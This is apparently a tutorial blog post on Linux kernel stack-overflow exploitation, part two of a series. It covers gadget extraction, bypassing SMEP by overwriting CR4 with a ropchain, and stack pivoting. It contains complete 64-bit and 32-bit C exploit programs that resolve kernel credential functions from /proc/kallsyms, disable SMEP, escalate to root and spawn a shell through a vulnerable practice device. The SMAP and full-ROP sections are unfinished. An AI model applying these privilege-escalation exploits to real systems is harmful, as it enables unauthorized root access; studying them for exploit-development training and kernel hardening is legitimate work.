- Introduction
- Return-oriented programming in kernel land
- Grabbing gadgets
- Non-executable gadgets!
- Bypass SMEP with different techniques
- Defeating SMEP
- CR4 Overwriting
- Stack pivoting
- FULL ROP - Ropping like a pro
- Bypass SMAP
- Defeating SMAP
Introduction
Hi everyone, I hope you're all well. Today we meet again for the second part of this series of kernel exploitation articles, which focuses on stack buffer overflows. In this part we're going to see more advanced techniques to bypass protections, and we will get started with ROP in kernel land.
Now that you are comfortable exploiting a basic buffer overflow in kernel land, I won't go back over the basics: we will get straight to the concrete stuff.
Without further ado, let's start with a small reminder of the ROP technique and of what changes in kernel land.
Return-oriented programming in kernel land
Small reminder of the technique
Return-oriented programming (ROP) is an exploitation technique that redirects the program's execution flow "several times" in order to bypass protections. When I say "several times", I am talking about the ropchain, which is a chain of gadgets. A gadget is a short sequence of executable instructions already present in the binary and ending in ret, jmp or call; ROP targets the ones ending in ret, hence the name. Each ret pops the next address from the stack, so by chaining gadgets we control the stack and can completely change the program's execution flow.
In kernel land the concept is exactly the same, except that a few subtleties will get in our way. We will come back to them later.
Grabbing gadgets
First of all, a question you may have asked yourself: where do we get our gadgets from?
In part 1 we went over the different files provided with a kernel exploitation challenge.
Let's come back to one of them:
- vmlinuz or bzImage
This file is simply the kernel itself but compressed into a single file.
It can be extracted into an ELF executable file, "vmlinux", which is useful to look for gadgets when doing ROP.
So yes, we can quite simply extract the gadgets from the kernel image.
There is a tool that extracts this image into an ELF executable.
It ships with the Linux kernel sources maintained by the great and unique Linus Torvalds, as scripts/extract-vmlinux.
Thanks to it we can extract the vmlinux executable, which contains all our gadgets! Simple, isn't it?
Let's test it:
$ ./extract_vmlinux.sh bzImage > vmlinux
$ ROPgadget --binary vmlinux > gadget.txt
(This may take a little while: we are talking about kernel gadgets, and there are a lot of them.)
A small piece of advice: dump all your gadgets into a text file once, as above. The number of gadgets is huge, so rerunning ROPgadget for every search would waste a lot of time; searching the text file is much faster.
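Once the dump exists, looking up a gadget is just a text search. Here is a minimal sketch of that lookup, assuming the usual ROPgadget line format "address : instructions". The helper names match_gadget_line() and find_gadget() are hypothetical, they are not part of any tool.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: if `line` looks like "<hex address> : <instructions>"
 * and the instructions are exactly `want`, store the address and return 1. */
int match_gadget_line(const char *line, const char *want, unsigned long long *addr)
{
    char *end;
    unsigned long long value = strtoull(line, &end, 16);
    size_t len;

    if (end == line || strncmp(end, " : ", 3) != 0)
        return 0;                 /* header or summary line, not a gadget */
    end += 3;
    len = strcspn(end, "\r\n");   /* ignore the trailing newline, if any */
    if (len != strlen(want) || strncmp(end, want, len) != 0)
        return 0;
    *addr = value;
    return 1;
}

/* Scan a ROPgadget dump and return the first address of `want`, or 0. */
unsigned long long find_gadget(const char *path, const char *want)
{
    char line[1024];
    unsigned long long addr = 0;
    FILE *f = fopen(path, "r");

    if (f == NULL)
        return 0;
    while (fgets(line, sizeof(line), f) != NULL)
        if (match_gadget_line(line, want, &addr))
            break;
    fclose(f);
    return addr;
}
```

For example, find_gadget("gadget.txt", "pop rdi ; ret") would return the address of the first exact match in the dump. The match is exact on purpose, so that "pop rdi ; ret 8" is not mistaken for "pop rdi ; ret".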
Non-executable gadgets!
A problem we can run into in kernel land is finding bad gadgets: non-executable gadgets...
We run into this problem far less often in userland, simply because there are far fewer gadgets.
It is important to know that gadgets are taken from your program, more precisely from the sections of your program. If you have written a bit of assembly, you know that a binary is structured in sections, and not all sections of a program are executable!
You can see the section layout of your program (ELF) with readelf:
readelf -S elfbin
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .interp PROGBITS 0000000000400238 00000238
000000000000001c 0000000000000000 A 0 0 1
[ 2] .note.ABI-tag NOTE 0000000000400254 00000254
0000000000000020 0000000000000000 A 0 0 4
[ 3] .note.gnu.bu[...] NOTE 0000000000400274 00000274
0000000000000024 0000000000000000 A 0 0 4
[ 4] .gnu.hash GNU_HASH 0000000000400298 00000298
000000000000003c 0000000000000000 A 5 0 8
[ 5] .dynsym DYNSYM 00000000004002d8 000002d8
00000000000001b0 0000000000000018 A 6 1 8
[ 6] .dynstr STRTAB 0000000000400488 00000488
00000000000000ba 0000000000000000 A 0 0 1
[ 7] .gnu.version VERSYM 0000000000400542 00000542
0000000000000024 0000000000000002 A 5 0 2
[ 8] .gnu.version_r VERNEED 0000000000400568 00000568
0000000000000020 0000000000000000 A 6 1 8
[ 9] .rela.dyn RELA 0000000000400588 00000588
0000000000000048 0000000000000018 A 5 0 8
[10] .rela.plt RELA 00000000004005d0 000005d0
00000000000000d8 0000000000000018 AI 5 22 8
[11] .init PROGBITS 00000000004006a8 000006a8
0000000000000017 0000000000000000 AX 0 0 4
[12] .plt PROGBITS 00000000004006c0 000006c0
00000000000000a0 0000000000000010 AX 0 0 16
[13] .text PROGBITS 0000000000400760 00000760
0000000000000252 0000000000000000 AX 0 0 16
[14] .fini PROGBITS 00000000004009b4 000009b4
0000000000000009 0000000000000000 AX 0 0 4
[15] .rodata PROGBITS 00000000004009c0 000009c0
0000000000000061 0000000000000000 A 0 0 8
[16] .eh_frame_hdr PROGBITS 0000000000400a24 00000a24
000000000000004c 0000000000000000 A 0 0 4
[17] .eh_frame PROGBITS 0000000000400a70 00000a70
0000000000000140 0000000000000000 A 0 0 8
[18] .init_array INIT_ARRAY 0000000000600df0 00000df0
0000000000000008 0000000000000008 WA 0 0 8
[19] .fini_array FINI_ARRAY 0000000000600df8 00000df8
0000000000000008 0000000000000008 WA 0 0 8
[20] .dynamic DYNAMIC 0000000000600e00 00000e00
00000000000001f0 0000000000000010 WA 6 0 8
[21] .got PROGBITS 0000000000600ff0 00000ff0
0000000000000010 0000000000000008 WA 0 0 8
[22] .got.plt PROGBITS 0000000000601000 00001000
0000000000000060 0000000000000008 WA 0 0 8
[23] .data PROGBITS 0000000000601060 00001060
0000000000000010 0000000000000000 WA 0 0 8
[24] .bss NOBITS 0000000000601070 00001070
0000000000000010 0000000000000000 WA 0 0 8
[25] .comment PROGBITS 0000000000000000 00001070
0000000000000029 0000000000000001 MS 0 0 1
[26] .symtab SYMTAB 0000000000000000 000010a0
00000000000006f0 0000000000000018 27 47 8
[27] .strtab STRTAB 0000000000000000 00001790
0000000000000295 0000000000000000 0 0 1
[28] .shstrtab STRTAB 0000000000000000 00001a25
0000000000000103 0000000000000000 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
L (link order), O (extra OS processing required), G (group), T (TLS),
C (compressed), x (unknown), o (OS specific), E (exclude),
l (large), p (processor specific)
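In this output only the sections flagged X (.init, .plt, .text, .fini) are executable, so a gadget address that falls anywhere else is useless. The check can be sketched as follows. The struct section type and the function name are hypothetical, a trimmed-down stand-in for a real ELF section header; the flag values are the standard ELF ones.

```c
#include <stddef.h>
#include <stdint.h>

#define SHF_EXECINSTR 0x4  /* ELF section flag that readelf prints as X */

/* Hypothetical, trimmed-down view of one section header. */
struct section {
    const char *name;
    uint64_t addr;
    uint64_t size;
    uint64_t flags;
};

/* Return 1 if `addr` lies inside a section marked executable, else 0. */
int gadget_is_executable(const struct section *secs, size_t n, uint64_t addr)
{
    for (size_t i = 0; i < n; i++) {
        if (addr >= secs[i].addr && addr - secs[i].addr < secs[i].size)
            return (secs[i].flags & SHF_EXECINSTR) != 0;
    }
    return 0;  /* not inside any known section */
}

/* Two rows copied from the readelf output above: .text (AX) and .data (WA). */
static const struct section example_sections[] = {
    { ".text", 0x400760, 0x252, 0x2 | 0x4 },  /* alloc | execute */
    { ".data", 0x601060, 0x010, 0x1 | 0x2 },  /* write | alloc */
};
```

With these two rows, an address such as 0x400800 is accepted because it sits in .text, while 0x601064 is rejected because .data is writable but not executable.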
Bypass SMEP with different techniques
In this part we will see how to bypass this dreaded protection, SMEP, using ROP and a stack pivot.
Reminder:
- SMEP
Supervisor Mode Execution Prevention (SMEP) prevents supervisor mode from unintentionally executing user space code. For example, a ret2usr payload, a userland function that calls kernel symbols found in /proc/kallsyms, can no longer be executed from kernel mode without a bypass.
Let's see how it works!
CR4 is a control register used in protected mode to control operations such as virtual-8086 support, enabling I/O breakpoints, page size extension and machine-check exceptions.
Looking at the state of the CR4 register, we can see that SMEP is active when bit 20 is set to 1:
// [arch/x86/include/asm/processor-flags.h]
#define X86_CR4_SMEP 0x00100000 /* enable SMEP support */
CR4 = 0x00000000001407f0 // SMEP activated here
CR4 register value 0x1407f0 = 0001 0100 0000 0111 1111 0000
(bits are numbered from the right, starting at 0: 0, 1, 2, 3, ...)
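Reading a bit by eye in a binary dump is error-prone, so here is a small sketch that does the test with a mask. X86_CR4_SMEP is the constant quoted above; X86_CR4_SMAP (bit 21) comes from the same kernel header; the function names are hypothetical.

```c
#include <stdint.h>

#define X86_CR4_SMEP 0x00100000UL  /* bit 20 */
#define X86_CR4_SMAP 0x00200000UL  /* bit 21 */

/* Return 1 if bit number `bit` (counted from 0 on the right) is set. */
int cr4_bit_is_set(uint64_t cr4, unsigned bit)
{
    return (int)((cr4 >> bit) & 1);
}

/* Convenience wrappers for the two protections discussed in this series. */
int smep_enabled(uint64_t cr4) { return (cr4 & X86_CR4_SMEP) != 0; }
int smap_enabled(uint64_t cr4) { return (cr4 & X86_CR4_SMAP) != 0; }
```

Applied to the value above, smep_enabled(0x1407f0) is true and smap_enabled(0x1407f0) is false, which matches the binary breakdown: bit 20 is 1 and bit 21 is 0.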
Defeating SMEP
There are several strategies to bypass SMEP.
CR4 Overwriting
SMEP is enabled when bit 20 of CR4 is set to 1, but what if we just change it?
Since a single control register is responsible for enabling SMEP, rewriting that register is one solution.
While executing in kernel mode we are allowed to write to this register.
For this we will build a ropchain.
But wait a minute, you need to know one thing first. The register is written through a kernel function called native_write_cr4(). This is the function that sets which protections such as SMEP, SMAP, ... are enabled. This means that to bypass SMEP we have to pass it a value in which bit 20 is no longer 1 but 0:
native_write_cr4(value)
Our value will be 0x407F0, the previous value of CR4 with bit 20 cleared, so that SMEP is deactivated.
Don't forget that the value of your register can differ from mine, so don't blindly copy the value from my article: take your own CR4 value, convert it from hex to binary and set bit 20 to 0.
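The conversion by hand can also be written as a single mask operation. A minimal sketch, where cr4_without_smep() is a hypothetical name:

```c
#include <stdint.h>

#define X86_CR4_SMEP 0x00100000UL  /* bit 20, from processor-flags.h */

/* Return `cr4` with only the SMEP bit cleared; every other bit is kept. */
uint64_t cr4_without_smep(uint64_t cr4)
{
    return cr4 & ~(uint64_t)X86_CR4_SMEP;
}
```

With the CR4 value from this article, cr4_without_smep(0x1407f0) gives 0x407f0. Feed it your own CR4 value rather than mine.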
We will use a gadget to load our argument (0x407F0) into rdi, the first argument register of the x86-64 calling convention, which sets the parameter of native_write_cr4(). In the end, the function is executed with the right parameter:
0xffffffffc12e57f2 pop rdi ; ret
0xffffffffc1045050 t native_write_cr4
But since the function just does a mov:
asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");
you can also ROP straight to the mov that writes the value into cr4, like this:
0xffffffffc12e57f2 pop rdi ; ret
0xffffffffc1045053 : mov cr4, rdi ; ret
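To make the layout of this chain concrete, here is a sketch of how the bytes could be packed into a buffer. The two gadget addresses are the ones quoted above and will differ on your kernel. The function name, the `pad` parameter (distance to the saved return address) and the `next` parameter (where to return once SMEP is off) are hypothetical: you have to determine them for your own target.

```c
#include <stdint.h>
#include <string.h>

/* Addresses quoted in the article; they differ on every kernel build. */
#define POP_RDI_RET      0xffffffffc12e57f2ULL  /* pop rdi ; ret */
#define MOV_CR4_RDI_RET  0xffffffffc1045053ULL  /* mov cr4, rdi ; ret */

/*
 * Fill `buf` with `pad` filler bytes followed by the four chain entries.
 * Returns the payload length, or 0 if `buf` is too small.
 */
size_t build_cr4_chain(unsigned char *buf, size_t cap, size_t pad,
                       uint64_t new_cr4, uint64_t next)
{
    const uint64_t chain[] = { POP_RDI_RET, new_cr4, MOV_CR4_RDI_RET, next };

    if (cap < pad || cap - pad < sizeof(chain))
        return 0;
    memset(buf, 'A', pad);                   /* filler up to the return address */
    memcpy(buf + pad, chain, sizeof(chain)); /* stored as little-endian qwords */
    return pad + sizeof(chain);
}
```

The first entry overwrites the saved return address, so the vulnerable function returns into pop rdi ; ret, which pops the new CR4 value and then returns into the mov.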
32BITS:
A small 32-bit equivalent: the concept remains the same, but the calling convention is not (the first argument goes in eax instead of rdi).
With native_write_cr4():
0xffffffffc12e57f2 pop eax ; ret
0xffffffffc1045050 t native_write_cr4
With mov cr4, src:
0xffffffffc12e57f2 pop eax ; ret
0xffffffffc1045053 : mov cr4, eax ; ret
Except that there is a problem...
This technique no longer works on recent kernels, because the function has been patched: it now checks that the pinned bits of CR4 have not changed, and if they have, it writes the register again with those bits restored to their original values.
void native_write_cr4(unsigned long val)
{
    unsigned long bits_changed = 0;

set_register:
    asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");

    if (static_branch_likely(&cr_pinning)) {
        if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
            bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
            val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
            goto set_register;
        }
        /* Warn after we've corrected the changed bits. */
        WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
                  bits_changed);
    }
}
You can see that CR pinning is implemented in this version of the function,
while in older versions it is not:
static inline void native_write_cr4(unsigned long val)
{
    asm volatile("mov %0,%%cr4": : "r" (val), "m" (__force_order));
}
This means that this technique is only valid on older kernels!
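To see why the patched function defeats our value, the correction step can be modelled in userland. This is only a sketch of the masking logic shown above, not kernel code: it assumes, for illustration, that only SMEP and SMAP are pinned, and pinned_cr4_write() is a hypothetical name.

```c
#include <stdint.h>

#define X86_CR4_SMEP 0x00100000UL
#define X86_CR4_SMAP 0x00200000UL

/* Assumption for this sketch: only SMEP and SMAP are pinned. */
static const uint64_t pinned_mask = X86_CR4_SMEP | X86_CR4_SMAP;

/*
 * Model of the correction step. `pinned_bits` is the state of the pinned
 * bits recorded by the kernel. Returns the value CR4 ends up holding.
 */
uint64_t pinned_cr4_write(uint64_t val, uint64_t pinned_bits)
{
    if ((val & pinned_mask) != pinned_bits)
        val = (val & ~pinned_mask) | pinned_bits;  /* restore pinned bits */
    return val;
}
```

If SMEP was recorded as enabled, pinned_cr4_write(0x407f0, X86_CR4_SMEP) gives back 0x1407f0: the bit we cleared is set again, so the write has no lasting effect.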
Even though the function is patched, I still put together a little exploit for you:
64Bits:
Diagram:
- Overwriting cr4 reg.
- Ret2usr.
- Spawn shell
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

int fd;

unsigned long __attribute__((regparm(3))) (*commit_creds)(unsigned long cred);
unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred);

/* Look up the address of a symbol in /proc/kallsyms (0 if not found). */
unsigned long kallsym_getaddr(const char* str)
{
    FILE *stream;
    char fbuf[256];
    char addr[32];

    stream = fopen("/proc/kallsyms","r");
    if(stream == NULL) {    /* fopen() returns NULL on failure */
        puts("Failed to open /proc/kallsyms");
        return 0;
    }

    memset(fbuf,0x00,sizeof(fbuf));
    while(fgets(fbuf,256,stream) != NULL) {
        char *p = fbuf;
        char *a = addr;

        if(strlen(fbuf) == 0)
            continue;
        memset(addr,0x00,sizeof(addr));
        fbuf[strlen(fbuf)-1] = '\0';    /* strip the trailing newline */
        while(*p != ' ')                /* copy the address field */
            *a++ = *p++;
        p+=3;                           /* skip " <type> " */
        if(!strcmp(p,str)) {
            fclose(stream);
            return strtoul(addr, NULL, 16);
        }
    }
    fclose(stream);
    return 0;
}

void get_shell(void) {
    if (getuid() == 0)
        execl("/bin/sh", "sh", NULL);
    else
        puts("[x] Failed to spawn root shell");
}

unsigned long user_cs, user_ss, user_rflags, user_sp, user_rip;

/* Save the userland context needed to build the iretq frame later. */
void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    user_rip = (unsigned long)get_shell;    /* where iretq lands in userland */
    puts("[*] Saved state");
}

void escalate_privs(void)
{
    __asm__(
        ".intel_syntax noprefix;"
        "movabs rax, 0xffffffff814c67f0;" //prepare_kernel_cred
        "xor rdi, rdi;"
        "call rax; mov rdi, rax;"
        "movabs rax, 0xffffffff814c6410;" //commit_creds
        "call rax;"
        "swapgs;"
        "mov r15, user_ss;"
        "push r15;"
        "mov r15, user_sp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, user_rip;"
        "push r15;"
        "iretq;"
        ".att_syntax;"
    );
}

int open_fd_device(void)
{
    fd = open("/dev/bufferoverflow", O_RDWR);
    if (fd < 0) {
        printf("[x] Error opening the FD\n");
        return -1;
    }
    printf("[+] File descriptor is open\n");
    return 0;
}

int main(void)
{
    commit_creds = (void *)kallsym_getaddr("commit_creds");
    prepare_kernel_cred = (void *)kallsym_getaddr("prepare_kernel_cred");

    unsigned char payload[] =
        "" // offset to reach the saved rip
        "" // pop rdi ; ret
        "" // new value for CR4 register
        "" // mov cr4, rdi ; ret
        ""; // escalate_privs function's address

    if (open_fd_device() < 0)
        return 1;
    save_state();
    write(fd, payload, sizeof(payload));
    return 0;
}
// gcc -static exploit.c -o exploit
32Bits:
A few things differ, such as the trap_frame structure and the prepare_tf() function. To put it simply, they play the same role as the register state saving in the 64-bit version: they are what lets us ret2usr in 32 bits.
Diagram:
- Overwriting cr4 reg.
- Ret2usr.
- Spawn shell
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

int fd;

unsigned long __attribute__((regparm(3))) (*commit_creds)(unsigned long cred);
unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred);

/* Look up the address of a symbol in /proc/kallsyms (0 if not found). */
unsigned long kallsym_getaddr(const char* str)
{
    FILE *stream;
    char fbuf[256];
    char addr[32];

    stream = fopen("/proc/kallsyms","r");
    if(stream == NULL) {    /* fopen() returns NULL on failure */
        puts("Failed to open /proc/kallsyms");
        return 0;
    }

    memset(fbuf,0x00,sizeof(fbuf));
    while(fgets(fbuf,256,stream) != NULL) {
        char *p = fbuf;
        char *a = addr;

        if(strlen(fbuf) == 0)
            continue;
        memset(addr,0x00,sizeof(addr));
        fbuf[strlen(fbuf)-1] = '\0';    /* strip the trailing newline */
        while(*p != ' ')                /* copy the address field */
            *a++ = *p++;
        p+=3;                           /* skip " <type> " */
        if(!strcmp(p,str)) {
            fclose(stream);
            return strtoul(addr, NULL, 16);
        }
    }
    fclose(stream);
    return 0;
}

/* Frame popped by iret when returning to userland. */
struct trap_frame {
    void * eip ; // instruction pointer
    uint32_t cs ; // code segment
    uint32_t eflags ; // CPU flags
    void * esp ; // stack pointer
    uint32_t ss ; // stack segment
} __attribute__((packed));
struct trap_frame tf;

void get_shell(void) {
    if (getuid() == 0)
        execl("/bin/sh", "sh", NULL);
    else
        puts("[x] Failed to spawn root shell");
}

/* Save the userland context into tf before triggering the overflow. */
void prepare_tf(void)
{
    asm("pushl %cs; popl tf+4;"
        "pushfl; popl tf+8;"
        "pushl %esp; popl tf+12;"
        "pushl %ss; popl tf+16;");
    tf.eip = &get_shell;
    tf.esp -= 1024; // unused part of stack
}

void escalate_privs(void)
{
    commit_creds(prepare_kernel_cred(0));
    asm("mov $tf, %esp;"
        "iret ;");
}

int open_fd_device(void)
{
    fd = open("/dev/bufferoverflow", O_RDWR);
    if (fd < 0) {
        printf("[x] Error opening the FD\n");
        return -1;
    }
    printf("[+] File descriptor is open\n");
    return 0;
}

int main(void)
{
    commit_creds = (void *)kallsym_getaddr("commit_creds");
    prepare_kernel_cred = (void *)kallsym_getaddr("prepare_kernel_cred");

    unsigned char payload[] =
        "" // offset to reach eip
        "" // pop eax ; ret
        "" // new value for CR4 register
        "" // mov cr4, eax ; ret
        ""; // escalate_privs function's address

    if (open_fd_device() < 0)
        return 1;
    prepare_tf();
    write(fd, payload, sizeof(payload));
    return 0;
}
// gcc -static -m32 exploit.c -o exploit
Stack pivoting
In this part you will learn how to bypass SMEP by building a fake stack.
The fake stack is the result of stack pivoting. The concept of stack pivoting is simple: the stack pointer must be changed so that it points to a memory area we control. Still using ROP, we will chain gadgets to move onto this fake stack.
This means that our ropchain changes the stack pointer, so the program's execution flow is redirected to a "fake stack", because the pointer now points to another area.
Hence the name "stack pivoting": the stack pivots.
Remember that the stack is defined by its pointer, the rsp register (or esp in 32 bits).
You will surely think of using a gadget like mov rsp, reg ; ret.
Unfortunately this gadget is not the best way to do stack pivoting.
Of course you can use it, but you will lose the current value of the stack pointer,
and repairing it afterwards would waste too much time.
That's why we will use another gadget, based on the xchg instruction.
Let's look at what it does:
> This instruction allows to exchange the value of two operands. The operands can be 2 general purpose registers or a register and a memory location. If a memory operand is referenced, the microprocessor lock protocol is automatically implemented for the duration of the exchange, whether or not the LOCK prefix is present.
And yes, with this instruction we can exchange the value of rsp with that of another register.
A gadget like xchg rsp, rdi ; ret would therefore put the value contained in rdi into rsp, and the old value of rsp into rdi.
By doing this we can move execution onto our fake stack,
but the process is not finished yet:
the pointer now points to this memory area, but how do we control it?
mmap() creates a new mapping in the virtual address space of the calling process.
By mapping a memory page we can "set up" our fake stack and have an entry point to it.
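unsigned long *fake_stack;

void stack_pivoting(void){
    // MAP_FIXED requires a page-aligned address, so replace 0x44444444
    // with a pivot address that is a multiple of 0x1000
    fake_stack = mmap((void *)(0x44444444 - 0x1000), 0x2000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
    if (fake_stack == MAP_FAILED)
        return;
    unsigned off = 0x1000 / 8; // first slot of the second page
    fake_stack[0] = 0xdead; // avoid double fault
    fake_stack[off++] = pop_rdi_ret;
    ...
}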
We mmap a fixed region, then start writing our ropchain.
Mapping from 0x44444444 - 0x1000 leaves a full page below the pivot address, so the stack has room to grow downwards when the chain calls kernel functions; without it there would not be enough memory space.
You should also write any value to index 0 to avoid a double fault.
A double fault exception occurs if the processor encounters a problem while trying to service a pending interrupt or exception.
The reason is that a page is only inserted into the page table after it has been accessed, not when it is mapped. We have mapped 0x2000 bytes, which is two pages. The ROP chain sits entirely in the second page, so we have to touch the first page as well.
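One detail worth spelling out: with MAP_FIXED, mmap() only accepts a page-aligned address, so the mapping base has to be derived from the pivot address by rounding down. Here is a sketch of that arithmetic, assuming 4 KiB pages. The struct and function names are hypothetical.

```c
#include <stdint.h>

#define PIVOT_PAGE_SIZE 0x1000UL  /* assumption: 4 KiB pages */

/* Where to map and where the chain starts, for a given pivot address. */
struct pivot_layout {
    uint64_t map_base;   /* page-aligned address to pass to mmap() */
    uint64_t map_len;    /* two pages: spare page + pivot page */
    uint64_t chain_off;  /* byte offset of the pivot address in the mapping */
};

struct pivot_layout pivot_layout_for(uint64_t pivot)
{
    struct pivot_layout l;
    uint64_t pivot_page = pivot & ~(PIVOT_PAGE_SIZE - 1);  /* round down */

    l.map_base = pivot_page - PIVOT_PAGE_SIZE;  /* one spare page below */
    l.map_len = 2 * PIVOT_PAGE_SIZE;
    l.chain_off = pivot - l.map_base;
    return l;
}
```

For a page-aligned pivot address the chain starts exactly at offset 0x1000, the start of the second page, which is the 0x1000 / 8 index used in stack_pivoting(). For an unaligned address such as 0x44444444 the mapping has to start at 0x44443000 and the chain lands at offset 0x1444.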
Here is a small diagram to summarize stack pivoting:
FULL ROP - Ropping like a pro
soon..
Bypass SMAP
Defeating SMAP
soon...